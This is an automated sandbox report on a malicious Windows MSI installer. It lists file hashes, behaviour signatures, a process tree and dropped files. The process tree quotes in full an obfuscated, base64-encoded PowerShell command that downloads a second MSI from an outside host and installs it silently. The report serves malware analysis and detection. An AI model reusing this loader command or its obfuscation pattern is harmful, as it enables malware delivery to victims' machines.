Overview

overview

8

Static

static

1

b029b40bad...JC.msi

windows7-x64

8

b029b40bad...JC.msi

windows10-2004-x64

8

Analysis

  • max time kernel
    64s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-10-2023 11:16

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b029b40badab029cbd916ab2e5147e9f01abd147e1bf9e5ed1564ee44a0d087f_JC.msi

  • Size

    3.4MB

  • MD5

    5d9e72d1e3a99bec71fad561fa95037c

  • SHA1

    fbc94c649ba3d8bb6c7e1d98e7fdeea40cd395b2

  • SHA256

    b029b40badab029cbd916ab2e5147e9f01abd147e1bf9e5ed1564ee44a0d087f

  • SHA512

    8d0311d94a0de8646ec2733530a2db7d2c6e2b03f54e54ac0bc84538a636fe8211e6a582530d9ea8cd02ba08e259d778498d6f29e6744ba45f434d2a87874c97

  • SSDEEP

    49152:E6rGohlj9szAlopTyWD57kEv53rw6cvOlM3w99xYF/gr/QaTdxKJWNYCILZ:qoSTyqk7vvO8Q9xU/w/QPOI9

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 5 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 13 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\b029b40badab029cbd916ab2e5147e9f01abd147e1bf9e5ed1564ee44a0d087f_JC.msi
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:3788
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1660
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 8A0067A9C55C95EA47E8E75A3971F754
      2⤵
      • Loads dropped DLL
      PID:4576
    • C:\Windows\Installer\MSIFE4C.tmp
      "C:\Windows\Installer\MSIFE4C.tmp" /DontWait /HideWindow "C:\Users\Admin\AppData\Local\Temp\DllImport.bat"
      2⤵
      • Executes dropped EXE
      PID:4072
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DllImport.bat" "
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4992
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -Ex BYpAss -NONI -w hIDdEn -c dEVICECreDENTiALDePloYmeNt ; ieX($(Iex('[sySTEm.teXT.ENCOdIng]'+[cHAr]58+[Char]58+'uTF8.GETstrInG([SYStEm.cONveRt]'+[cHAr]0x3a+[chaR]0X3a+'FRomBASE64sTring('+[ChAr]34+'JHlyZ09mcWwgPSBBRGQtdHlwRSAtTUVtYkVyZGVGaU5JdGlvbiAnW0RsbEltcG9ydCgiVXJsbW9OIiwgQ2hhclNldCA9IENoYXJTZXQuQW5zaSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciBsUyxzdHJpbmcgSlVUeixzdHJpbmcgZ0FSbVFUUHhmLHVpbnQgeixJbnRQdHIgU3RSKTsnIC1OQU1lICJzWVgiIC1uQW1FU1BBY0UgRFhEIC1QYXNzVGhydTsgJHlyZ09mcWw6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHBzOi8vdGh1bWJuYWlsbXliaXMueHl6L3JtL3ZzLzE3L3JlbGVhc2UvMzMxMTAvbmxzZGF0YTA4MTYubXNpIiwiJGVOdjpBTExVU0VSU1BST0ZJTEVcbmxzZGF0YTA4MTYubXNpIiwwLDApO3N0QVJULVNsZWVwKDMpOyYgbXNpZXhlYyAvaSAiJGVOVjpBTExVU0VSU1BST0ZJTEVcbmxzZGF0YTA4MTYubXNpIiAvcW4gL25vcmVzdGFydA=='+[chAr]0x22+'))')))
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2752
      • C:\Windows\system32\DeviceCredentialDeployment.exe
        "C:\Windows\system32\DeviceCredentialDeployment.exe"
        3⤵
          PID:3436
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1o5y1c1r\1o5y1c1r.cmdline"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:548
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES45DE.tmp" "c:\Users\Admin\AppData\Local\Temp\1o5y1c1r\CSC60134CAA865D44ECA1F0884F9DC89964.TMP"
            4⤵
              PID:2824
          • C:\Windows\system32\msiexec.exe
            "C:\Windows\system32\msiexec.exe" /i C:\ProgramData\nlsdata0816.msi /qn /norestart
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2692

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Config.Msi\e57eddd.rbs
        Filesize

        1KB

        MD5

        cc0669ea71959ad8d332b26f4b943e73

        SHA1

        0869c38d3cee326a8a5c5f5844d6884ce21aedef

        SHA256

        8467721849e8b83a9d8eae01f0b017688410fd28fae9869461cc6e2e6038e1b1

        SHA512

        a048d7c174f75ed141c8afcd1b639cf18b40fa35741293d6a85373bad9e4f5002f9ac6b43aa84587b5facff6153e7f3b6d3e427627f1515395d563452d8027d8

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\1o5y1c1r\1o5y1c1r.dll
        Filesize

        3KB

        MD5

        6e3ce689436f2f9ed7bb48f1486f650a

        SHA1

        c4d479a0bc2ed78e31fb8ddb7fc0859ff5ba8d4d

        SHA256

        7064056ba843591d40d22b732831b499483e3946df6542ae5fa38abfe2e9498e

        SHA512

        dc006209d741ce3b0d92a285fc212068c92a7f07ec91cd427bb5a802c1135ac22f64b0112271e6e577eee13bc454f85291a9262a542872a2c6adffd75dc22475

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\DllImport.bat
        Filesize

        5.0MB

        MD5

        5cae5e0da425c1f0f8e5cb45292b1dee

        SHA1

        79f65e65785f1a8d39b0a63cbbf0f1684b6d9770

        SHA256

        99f9875bd0d5d59071aaae3d7a6e2dbea0c883da0d39988f0081ee47d6fe25b1

        SHA512

        48bc1e9a8171aa81a251f27387f0cffe99bcd9350173b21dd6b287b0e00c2618a6ee632cdebce10313196fe35ebdb6f73f35d9ee3a2a1bb930680b4cb46231c7

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\RES45DE.tmp
        Filesize

        1KB

        MD5

        6e7ee3787081f29b7e87d0d3b9b41243

        SHA1

        cc762e855d73360a2a4d22df36916ba91aabb8fc

        SHA256

        af1ce30afb511cac9d67640de9a59e719a189bc915016c8bec2b84871dcf0ccf

        SHA512

        dd7b6ab9818abd3de82ad769de601ca38770b2a05cec891805db2a89588987897a884e48143706d5c426ed77ea33bba5bcbcac51588c0bfda5ea34eda3d62dd3

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qtu1kuau.s1c.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Windows\Installer\MSIEEE4.tmp
        Filesize

        719KB

        MD5

        89f70b588a48793450dd603b6cd4096f

        SHA1

        9b6509c031856c715d62853c4e93efbdf48d5aeb

        SHA256

        066c52ed8ebf63a33ab8290b7c58d0c13f79c14faa8bf12b1b41f643d3ebe281

        SHA512

        fb04c530430eea6149fd7216f64751e641394a66c0cb222f70c29361baa621a78f906e0adff19bd4cbe5de69edcea7e40bff7c2e068fd4dbd057ca6494db861a

        Download Submit

      • C:\Windows\Installer\MSIEEE4.tmp
        Filesize

        719KB

        MD5

        89f70b588a48793450dd603b6cd4096f

        SHA1

        9b6509c031856c715d62853c4e93efbdf48d5aeb

        SHA256

        066c52ed8ebf63a33ab8290b7c58d0c13f79c14faa8bf12b1b41f643d3ebe281

        SHA512

        fb04c530430eea6149fd7216f64751e641394a66c0cb222f70c29361baa621a78f906e0adff19bd4cbe5de69edcea7e40bff7c2e068fd4dbd057ca6494db861a

        Download Submit

      • C:\Windows\Installer\MSIF3F6.tmp
        Filesize

        719KB

        MD5

        89f70b588a48793450dd603b6cd4096f

        SHA1

        9b6509c031856c715d62853c4e93efbdf48d5aeb

        SHA256

        066c52ed8ebf63a33ab8290b7c58d0c13f79c14faa8bf12b1b41f643d3ebe281

        SHA512

        fb04c530430eea6149fd7216f64751e641394a66c0cb222f70c29361baa621a78f906e0adff19bd4cbe5de69edcea7e40bff7c2e068fd4dbd057ca6494db861a

        Download Submit

      • C:\Windows\Installer\MSIF3F6.tmp
        Filesize

        719KB

        MD5

        89f70b588a48793450dd603b6cd4096f

        SHA1

        9b6509c031856c715d62853c4e93efbdf48d5aeb

        SHA256

        066c52ed8ebf63a33ab8290b7c58d0c13f79c14faa8bf12b1b41f643d3ebe281

        SHA512

        fb04c530430eea6149fd7216f64751e641394a66c0cb222f70c29361baa621a78f906e0adff19bd4cbe5de69edcea7e40bff7c2e068fd4dbd057ca6494db861a

        Download Submit

      • C:\Windows\Installer\MSIF6F5.tmp
        Filesize

        719KB

        MD5

        89f70b588a48793450dd603b6cd4096f

        SHA1

        9b6509c031856c715d62853c4e93efbdf48d5aeb

        SHA256

        066c52ed8ebf63a33ab8290b7c58d0c13f79c14faa8bf12b1b41f643d3ebe281

        SHA512

        fb04c530430eea6149fd7216f64751e641394a66c0cb222f70c29361baa621a78f906e0adff19bd4cbe5de69edcea7e40bff7c2e068fd4dbd057ca6494db861a

        Download Submit

      • C:\Windows\Installer\MSIF6F5.tmp
        Filesize

        719KB

        MD5

        89f70b588a48793450dd603b6cd4096f

        SHA1

        9b6509c031856c715d62853c4e93efbdf48d5aeb

        SHA256

        066c52ed8ebf63a33ab8290b7c58d0c13f79c14faa8bf12b1b41f643d3ebe281

        SHA512

        fb04c530430eea6149fd7216f64751e641394a66c0cb222f70c29361baa621a78f906e0adff19bd4cbe5de69edcea7e40bff7c2e068fd4dbd057ca6494db861a

        Download Submit

      • C:\Windows\Installer\MSIF6F5.tmp
        Filesize

        719KB

        MD5

        89f70b588a48793450dd603b6cd4096f

        SHA1

        9b6509c031856c715d62853c4e93efbdf48d5aeb

        SHA256

        066c52ed8ebf63a33ab8290b7c58d0c13f79c14faa8bf12b1b41f643d3ebe281

        SHA512

        fb04c530430eea6149fd7216f64751e641394a66c0cb222f70c29361baa621a78f906e0adff19bd4cbe5de69edcea7e40bff7c2e068fd4dbd057ca6494db861a

        Download Submit

      • C:\Windows\Installer\MSIF7B1.tmp
        Filesize

        719KB

        MD5

        89f70b588a48793450dd603b6cd4096f

        SHA1

        9b6509c031856c715d62853c4e93efbdf48d5aeb

        SHA256

        066c52ed8ebf63a33ab8290b7c58d0c13f79c14faa8bf12b1b41f643d3ebe281

        SHA512

        fb04c530430eea6149fd7216f64751e641394a66c0cb222f70c29361baa621a78f906e0adff19bd4cbe5de69edcea7e40bff7c2e068fd4dbd057ca6494db861a

        Download Submit

      • C:\Windows\Installer\MSIF7B1.tmp
        Filesize

        719KB

        MD5

        89f70b588a48793450dd603b6cd4096f

        SHA1

        9b6509c031856c715d62853c4e93efbdf48d5aeb

        SHA256

        066c52ed8ebf63a33ab8290b7c58d0c13f79c14faa8bf12b1b41f643d3ebe281

        SHA512

        fb04c530430eea6149fd7216f64751e641394a66c0cb222f70c29361baa621a78f906e0adff19bd4cbe5de69edcea7e40bff7c2e068fd4dbd057ca6494db861a

        Download Submit

      • C:\Windows\Installer\MSIF958.tmp
        Filesize

        719KB

        MD5

        89f70b588a48793450dd603b6cd4096f

        SHA1

        9b6509c031856c715d62853c4e93efbdf48d5aeb

        SHA256

        066c52ed8ebf63a33ab8290b7c58d0c13f79c14faa8bf12b1b41f643d3ebe281

        SHA512

        fb04c530430eea6149fd7216f64751e641394a66c0cb222f70c29361baa621a78f906e0adff19bd4cbe5de69edcea7e40bff7c2e068fd4dbd057ca6494db861a

        Download Submit

      • C:\Windows\Installer\MSIF958.tmp
        Filesize

        719KB

        MD5

        89f70b588a48793450dd603b6cd4096f

        SHA1

        9b6509c031856c715d62853c4e93efbdf48d5aeb

        SHA256

        066c52ed8ebf63a33ab8290b7c58d0c13f79c14faa8bf12b1b41f643d3ebe281

        SHA512

        fb04c530430eea6149fd7216f64751e641394a66c0cb222f70c29361baa621a78f906e0adff19bd4cbe5de69edcea7e40bff7c2e068fd4dbd057ca6494db861a

        Download Submit

      • C:\Windows\Installer\MSIFE4C.tmp
        Filesize

        404KB

        MD5

        f3b3db27ab667f5ed37d1523424b06ac

        SHA1

        cdfa19dabc97005a3d5b3ac4dec171d0b3f2755d

        SHA256

        656c1f34c279d45fde64a8a71eeb8d17c7679543d61c05399826cc903d5ec397

        SHA512

        aa9cd94dde04b7b0235dc0aa06e3e74369ba1017ac4a6fcc3f4422619c10539b72f22a70341ef62a83af0d0fa1461c86343dd7e05cd238e658f73efea6c9d091

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\1o5y1c1r\1o5y1c1r.0.cs
        Filesize

        263B

        MD5

        bce29643104bb7fb77da7fcba72bd023

        SHA1

        44e512805c61bc7609f2a3fbbf25c3e5f050e448

        SHA256

        7a015f61be43eecda5b94569061c3745f2e98b2c6ab8322954fef37047cf0e60

        SHA512

        49eafe02b78be36036bedc28fba6265094d4368f8258f2d309a9a1d2b468dda69efaea149fa13bc51079c2f0a4dea55ce9221e5d10c186453ff9ef021ebf5fb8

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\1o5y1c1r\1o5y1c1r.cmdline
        Filesize

        369B

        MD5

        278dfcd60f879d4336e6f687a5a7d7d7

        SHA1

        aef1e9913ee9e23deadcfdf3ae2e30d021d5ec14

        SHA256

        d8ba0c55c84b9ee2da7277341e47eebfd382b933030702f3ee427ed9d93f5bc1

        SHA512

        3ceb20175f978aeefe8754bca420c097c8461c2fbb6f69b495f95bc3c463224303c7caacb8b3c14b7dcbf867f8bd5fc37ea7ce76b7bf183f5afacbd5b306f7b4

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\1o5y1c1r\CSC60134CAA865D44ECA1F0884F9DC89964.TMP
        Filesize

        652B

        MD5

        c701b53afb55e8d9754390454a65a6da

        SHA1

        d477c6b3e2781e4f63d8530859ff33394f21aca9

        SHA256

        e95db81d5746a95e1881534343b67b69ddc91ee68a47f610a72dba27944671d9

        SHA512

        5a840eee0605db8fdbc5861217e27eacde682981d79fe875a4415ffa754f58e36670b2109822b88b488afdc34a48f1cbf8668b3e0f76d1cf508d825c8e27c92a

        Download Submit

      • memory/2752-56-0x000001D4FA9F0000-0x000001D4FAA00000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2752-55-0x000001D4FA9F0000-0x000001D4FAA00000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2752-54-0x00007FFCD3180000-0x00007FFCD3C41000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2752-69-0x000001D4FAB20000-0x000001D4FAB28000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2752-53-0x000001D4FAB30000-0x000001D4FAB52000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2752-77-0x00007FFCD3180000-0x00007FFCD3C41000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2752-78-0x000001D4FA9F0000-0x000001D4FAA00000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2752-79-0x000001D4FA9F0000-0x000001D4FAA00000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2752-81-0x00007FFCD3180000-0x00007FFCD3C41000-memory.dmp

        Filesize

        10.8MB

        Download